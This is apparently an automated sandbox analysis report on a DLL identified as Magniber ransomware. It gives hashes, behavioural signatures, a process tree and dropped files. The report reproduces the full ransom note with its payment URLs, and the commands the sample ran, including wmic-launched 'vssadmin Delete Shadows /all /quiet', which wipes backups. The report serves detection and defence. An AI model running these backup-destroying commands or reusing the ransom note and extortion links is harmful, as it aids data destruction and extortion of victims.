Overview

overview

10

Static

static

3

3088d9d808...13.dll

windows7-x64

10

3088d9d808...13.dll

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    160s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    31-12-2023 09:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    3088d9d808dd030a756633437f351b13.dll

  • Size

    33KB

  • MD5

    3088d9d808dd030a756633437f351b13

  • SHA1

    a4e78428c7aa5f14681a313fd3f92c9267e9469a

  • SHA256

    9209b297a4d3af1a82e4a60fa45fa558f08a502ebcf5dc2fa487505fd72be331

  • SHA512

    2db4cc645b040f5e5e73d61db8342b40b5fd592ad96b5187d8513e5fd6864da6306ebc887b58df7ebf94f00aac703a3acfe30e326bd9bf7eec49a27276d75b70

  • SSDEEP

    768:JxnHytUcpkucln36De22PJNFai4OLS5wz3YKUt4fSsDZ:J0DkVV6Dh2dHrdzrbNZ

Score
10/10
magniberransomware

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\readme.txt婍

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://70fcec8880c066a01eemkyhecy.yeipgu36oui5z4yvck5w6d252oo3h7ktcsxvs3m2wac6ezmti2iotzad.onion/emkyhecy Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://70fcec8880c066a01eemkyhecy.mixedon.xyz/emkyhecy http://70fcec8880c066a01eemkyhecy.actmake.site/emkyhecy http://70fcec8880c066a01eemkyhecy.spiteor.space/emkyhecy http://70fcec8880c066a01eemkyhecy.bearsat.space/emkyhecy Note! These are temporary addresses! They will be available for a limited amount of time! ?�
URLs

http://70fcec8880c066a01eemkyhecy.yeipgu36oui5z4yvck5w6d252oo3h7ktcsxvs3m2wac6ezmti2iotzad.onion/emkyhecy

http://70fcec8880c066a01eemkyhecy.mixedon.xyz/emkyhecy

http://70fcec8880c066a01eemkyhecy.actmake.site/emkyhecy

http://70fcec8880c066a01eemkyhecy.spiteor.space/emkyhecy

http://70fcec8880c066a01eemkyhecy.bearsat.space/emkyhecy

Signatures

  • Detect magniber ransomware 1 IoCs
  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

    ransomwaremagniber
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Renames multiple (57) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Modifies registry class 5 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\3088d9d808dd030a756633437f351b13.dll,#1
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1568
    • C:\Windows\system32\notepad.exe
      notepad.exe C:\Users\Public\readme.txt?
      2⤵
      • Opens file in notepad (likely ransom note)
      PID:2492
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2516
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1716
    • C:\Windows\system32\wbem\wmic.exe
      C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1040
    • C:\Windows\system32\cmd.exe
      cmd /c "start http://70fcec8880c066a01eemkyhecy.mixedon.xyz/emkyhecy^&2^&42298602^&57^&311^&12"?
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:828
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://70fcec8880c066a01eemkyhecy.mixedon.xyz/emkyhecy&2&42298602&57&311&12?
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2448
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2448 CREDAT:275457 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:2060
  • C:\Windows\system32\CompMgmtLauncher.exe
    CompMgmtLauncher.exe
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1736
    • C:\Windows\system32\wbem\wmic.exe
      "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
      2⤵
        PID:1748
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
        PID:436
      • C:\Windows\system32\vssadmin.exe
        vssadmin.exe Delete Shadows /all /quiet
        1⤵
        • Interacts with shadow copies
        PID:2304
      • C:\Windows\system32\cmd.exe
        cmd /c CompMgmtLauncher.exe
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:2260
      • C:\Windows\system32\vssadmin.exe
        vssadmin.exe Delete Shadows /all /quiet
        1⤵
        • Process spawned unexpected child process
        • Interacts with shadow copies
        PID:2252

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        344B

        MD5

        0f76eecd3788894908e31ddc1de45f53

        SHA1

        2017e898c535c315dd943360c74a429caae9da33

        SHA256

        3d944f423e0d36c0820b734a1ce77b50816093430d0d01e56fe41ca1580952e7

        SHA512

        39c35cba40ae4517b6aa92a558a469f7e1fc17e18d1e63f4b4d9df65c68da5e827c4e357b6db0d78f9e9455a61c3f8c7ffa5ff39c0db45bd4f86d61477c4eb90

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        344B

        MD5

        20d6f146f6908911837bc5932e10a0a9

        SHA1

        a60f5005ed969f671e4f565ca26c682ee5d6e2a4

        SHA256

        d707420fd1418ff8a823e226249d6265a676a234b0f225cc00142c5509351032

        SHA512

        b2007e204aba360ca14d542104469de6e5a77a45279d0533c9c1b720004166734590495384ba81a44b8e47f75fe450ce9333af7a4b5f5dce8ded4d415161b565

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        344B

        MD5

        b8ce16784a35823a2a49cf9b5a70c25c

        SHA1

        88a6d4484b0d5c9e1e42d6c7e4fcff8d051f0d9d

        SHA256

        0a6d7a04f18536fd651e5e546801be1cfac7756449938740d971a66e94add288

        SHA512

        19f6f862d8d6663143b8e34fd6b6ed9c58c63445dd55a05622b5d4cfa14c8954548f340794e7b1ef4b886388061fba3ef65643b9a81f5c68991de3aadb6f552e

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        344B

        MD5

        0fe23f83f85654328f326b6c45d9df4f

        SHA1

        e934947be4a1fa018d2e49cc963d9260a981db85

        SHA256

        4540ed0ac7fbd4d34739e0bcd1a4988d62e9c24e72864000e6395bdbaa560da4

        SHA512

        8ee69911a044a862d2faf1fb771dd080543f809c03eb8e5c2cff19e644519a83f67e4f888aa47e2603d45790283f644c84b9a9268e27c93bcfa49e5ee06edc05

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        344B

        MD5

        e8f83ae391f1afc0024bea145c46f6b7

        SHA1

        a4e117919c44fd07b596f3e806faf061383a0bcc

        SHA256

        f1d8a7e675431337ef1bc369f83b4ca2089a42b3f84920eccf539dadfd8ed529

        SHA512

        bc6926690278e3faca8db3c51dd3923395421774e437c297b5b403600bbe37f3649bc1dbc01031c35e09d1e20f81347d81a735916a11b3bd93a21ed4ce37570e

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        344B

        MD5

        a95515f2b954c62900f6d70ab2eb6498

        SHA1

        8442392082b038d6ac254cfa3b75cba73adf2136

        SHA256

        b41fd3c3321aaa2bfa4642edaaef949a3db28caf003b3ea86d235070a3c7bc58

        SHA512

        d646c37feb5920929ad7433d4092d2654e806ba76b9ac5932c18448a832a32c1ee749f516c39d22da01db90112db74e3da240efd1b74f54a88de4ee850069e88

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        344B

        MD5

        1d02f6cce79aca258292ef775a157790

        SHA1

        882fbc8f6e0a5f7ec1f18e4a14cdfb481e066c78

        SHA256

        75c71f097274eda614a336b3b02639a9fd14eb938154824c4104a240aee2d244

        SHA512

        67e58b44ad7e81b8412a3bbaadbbf12c111eea200bc79cbeeca3545cf36e1ef0dbf8628c3c1cce984a2199eeebae69c118847d102cc0e61df45dd78d71504284

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        344B

        MD5

        22f2e3576bd3bb0b49847a7e55248199

        SHA1

        f987c8cd80a3ae2213f1c95a1e95aade26f6efeb

        SHA256

        434d67d1646dba2bfc2cb43648c52cc25a382103c0df60ef06fe9153852ce994

        SHA512

        529edd391770afd149d70555308d55b543b4e17133c6149e43a4584df4ed2b2738442508bfe1622beaa4a5c043f04c970a7f375f77061d995d88c3b882cdb248

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        344B

        MD5

        04009dfbbd42c2c1baa78441b66cd2c9

        SHA1

        6761777704c5c05c7c0a91fbc60aca9bb43af169

        SHA256

        401b5f9c2a6aa3f0322dafc6472e8650cf8c2bf72b9032a963641dfeb89c248a

        SHA512

        9248cab246aa9c4a5a9cd00aca24213cb20ba90e7d4990b90975c91637f4013a0ad3304d4b1663fb6534e41b1fd2b7fa4f9f8e83eb669b6b4b7763c321321d3d

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        344B

        MD5

        2918bd443bb2a1d1a18312d439c4e1f3

        SHA1

        651754a02c6403fe6bc8ead4503a10067263edb1

        SHA256

        cf432f2b86352317a1f7ab8aeb30fdb41594b933338c797355ead4e39b37c42a

        SHA512

        32fcb9ff17681618a941afe73416cb8a24d9ba9c0689821ceda729a98c4648628db71fcc666bc3f1374c3425b975899788cce2bbe0169ca01917e3c3d70b2b11

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
        Filesize

        344B

        MD5

        ca244fc3ec859e517687a1e3e2aeedec

        SHA1

        ff53292a98ee1b3f385575bb4ec08aebf611e472

        SHA256

        774d95d233bf7c59bd56b9d142e1829a5f70be1875b2fc4494d0cde8596a1f8c

        SHA512

        4b5dbf9388d489f190b540b4ec04e018fc38596bab5fac252b16ca33f6a7fdcfdce30feef5ef11d6d21febe99b147f8e1f703f7ba9209c28bbaccfa61a549526

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\CabB6D4.tmp
        Filesize

        65KB

        MD5

        ac05d27423a85adc1622c714f2cb6184

        SHA1

        b0fe2b1abddb97837ea0195be70ab2ff14d43198

        SHA256

        c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

        SHA512

        6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\TarB6F6.tmp
        Filesize

        171KB

        MD5

        9c0c641c06238516f27941aa1166d427

        SHA1

        64cd549fb8cf014fcd9312aa7a5b023847b6c977

        SHA256

        4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

        SHA512

        936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

        Download Submit

      • C:\Users\Admin\Pictures\readme.txt婍
        Filesize

        1KB

        MD5

        89cb0bc329eabb72e1b27e67eb0e4d9e

        SHA1

        c155bfce321353e24a2f8fdf4e46f5328ddafab3

        SHA256

        1e1e5fed25183824dd6dad5716c851c9ece031ffe46511daa3dfe7fbc37c647c

        SHA512

        a2ac70d083cf28ae38f09c04a3ee84217b04d8a36d127a7373e60575ba34810a2a5c3962ca867a77ab03d706ff8468c0cef01f4d172dc01d452ff761fbf29afa

        Download Submit

      • memory/1568-19-0x0000000001DB0000-0x00000000026F5000-memory.dmp

        Filesize

        9.3MB

        Download